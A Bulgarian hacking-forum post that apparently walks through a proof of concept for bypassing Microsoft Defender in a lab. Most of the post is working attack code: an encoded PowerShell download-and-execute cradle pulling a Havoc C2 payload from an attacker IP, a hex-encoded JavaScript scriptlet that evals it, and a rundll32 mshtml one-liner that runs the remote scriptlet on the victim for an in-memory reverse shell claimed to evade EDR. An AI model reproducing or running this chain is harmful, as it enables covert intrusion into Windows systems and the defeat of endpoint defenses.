Преминете към съдържанието

МЕУ организира кампания за пентестове в държавната администрация

Целта на кампанията е да подобри киберсигурността в държавната администрация, като участието в нея е доброволно и не се обвързва с възнаграждение.
Прочети повече за програмата

Добре дошли в Хакинг.БГ! 

Всеки един от нас стои на раменете на гигантите, споделили знанията и опита си с нас.

Този форум е нашият начин да върнем жеста за бъдещите и текущите кадри в киберсигурността.

Стремим се да предоставим платформа, където членовете могат да развиват своите умения, като се дава приоритет на етиката, сигурността и поверителността!

Заобикаляне на MS дефендър PoC


Препоръчан пост


  • Група:  [Администратор]
  • Последователи:  15
  • Брой мнения:  135
  • Репутация:   87
  • Спечелени дни:  37
  • Регистриран на:  11.04.2023
  • Статус:  Оффлайн
  • Система/OS::  Windows

Използвам в този пок 3 машини 1 командо за създаване на зловредни програми; 1 кали за сервиране на файлове, C2 и други неща; 1 domain controller.

Този пок работи и в привилигирован и непривилигирован ps шел.

В командото (10) създайте пейлоуд енкодиран в base64 и запазете в текстов файл:

$command = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.56.128/hav-pay.exe')"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
Write-Output $encodedCommand

В горния код създавам три параметъра, които започват с $ знак. В $command запазвам кода, който при екзекуция от "жертвата" ще направи обратна връзка към атакуващата машина, хостваща файла hav-pay.exe, което е хавок пейлоуд. 

В кали превърнете пейлоуда в шестнадесетична форма, която ще стейджнем

echo -n "new ActiveXObject(\"WScript.Shell\").Run(\"powershell.exe -nop -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA1ADYALgAxADIAOAAvAGgAYQB2AC0AcABhAHkALgBlAHgAZQAnACkA\")" | xxd -p | tr -d '\n' > hex.payload

Копирайте следващия код във файл с някакво рандом име и вкарайте hexadecimal кода в променливата hex:

<?xml version="1.0"?>
<component>
<script>
try{
<![CDATA[
var hex = "ТУК";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>
}catch(e){
eval(str)
}
</script>
</component>

Създайте папка и преместете последния код (test.tmp) и hav-pay.exe в нея. Пуснете сървър. Може и http-server, python http.server, може nginx, каквото си предпочитате за сервиране на файлове. (python -m http.server 80)

В компютъра на жертвата отворете powershell, като администратор например:

rundll32  javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication";document.write();GetObject("script"+":"+"http://<IP>/test.tmp")

В моя случай използвам havoc reverse shell payload и го инжектирам директно в паметта, създавайки свръзка без да провокира реакция в EDR защитата. Не съм тествал на други EDR-и.

понеже една част от тоя poc го пиша  и по спомен не си спомням дали пейлоуда който ползвах беше .exe или ps1

Link to comment
Сподели другаде

Join the conversation

Можете да публикувате сега и да се регистрирате по-късно. If you have an account, sign in now to post with your account.

Гост
Отговори на тази тема

×   Поставено като форматиран текст.   Вместо това поставете като обикновен текст

  Разрешени са само 75 емотикони.

×   Вашата връзка е вградена автоматично.   Вместо това се показва като връзка

×   Вашето предишно съдържание е възстановено.   Изчистване на редактора

×   Не можете да качите директно снимка. Качете или добавете изображението от линк (URL)

  • Регистрирайте се

    Регистрирайте се за да използвате пълната функционалност на форума 🙂

HACKING.BG Партньори

transparent1.png.c15979e1dc997cdd3a9941e342368a9b.png2.png.3e2592eadc660ecc831f1fdd569e8eb4.pngLogonobackground.thumb.png.546f31037e975b6fd85c69e35f300db6.png600_489534840.png.72981fb02b90f1986dd7ade4d561e6d0.pngcyberclub-logo-text.png.6e9d11752e2eade43d40337d83365e48.png

×
×
  • Създай ново...

Важна информация!

Политика за сигурност и условия на ползване Privacy Policy